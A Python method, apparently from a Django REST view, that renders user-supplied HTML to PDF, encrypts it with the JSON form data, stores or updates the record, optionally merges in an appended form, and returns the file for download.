def post(self, request, application_id): html = request.data["html"] json_data = request.data["json_data"] user_id = request.user.id app = get_application_for_user(application_id, user_id) if not app: return HttpResponseNotFound(no_record_found) pdf_type = request.query_params.get("pdf_type") version = request.query_params.get("version") if None in [pdf_type, version]: return HttpResponseBadRequest("Missing parameters.") try: pdf_result = self.get_pdf_by_application_id_and_type( application_id, pdf_type) pdf_content = self.generate_pdf(html) (pdf_key_id, pdf_content_enc) = settings.ENCRYPTOR.encrypt(pdf_content) (pdf_key_id, json_enc) = settings.ENCRYPTOR.encrypt( json.dumps(json_data).encode("utf-8")) if pdf_result: pdf_result.data = pdf_content_enc pdf_result.json_data = json_enc pdf_result.key_id = pdf_key_id pdf_result.pdf_type = pdf_type pdf_result.version = version pdf_result.last_updated = timezone.now() else: pdf_result = PreparedPdf( application_id=application_id, data=pdf_content_enc, json_data=json_enc, key_id=pdf_key_id, pdf_type=pdf_type, version=version, ) pdf_result.save() app.last_printed = timezone.now() app.save() except Exception as ex: LOGGER.error("ERROR: Pdf generation failed %s", ex) raise appended_form = request.data.get("appended_form", None) if appended_form: pdf_merger = PdfFileMerger() merged_forms = BytesIO() pdf_merger.append(PdfFileReader(stream=BytesIO(pdf_content))) pdf_merger.append( PdfFileReader( stream=BytesIO(self.generate_pdf(appended_form)))) pdf_merger.write(merged_forms) merged_forms.seek(0) pdf_content = merged_forms.read() pdf_merger.close() if request.query_params.get("noDownload"): return HttpResponse(status=204) else: return self.create_download_response(pdf_content)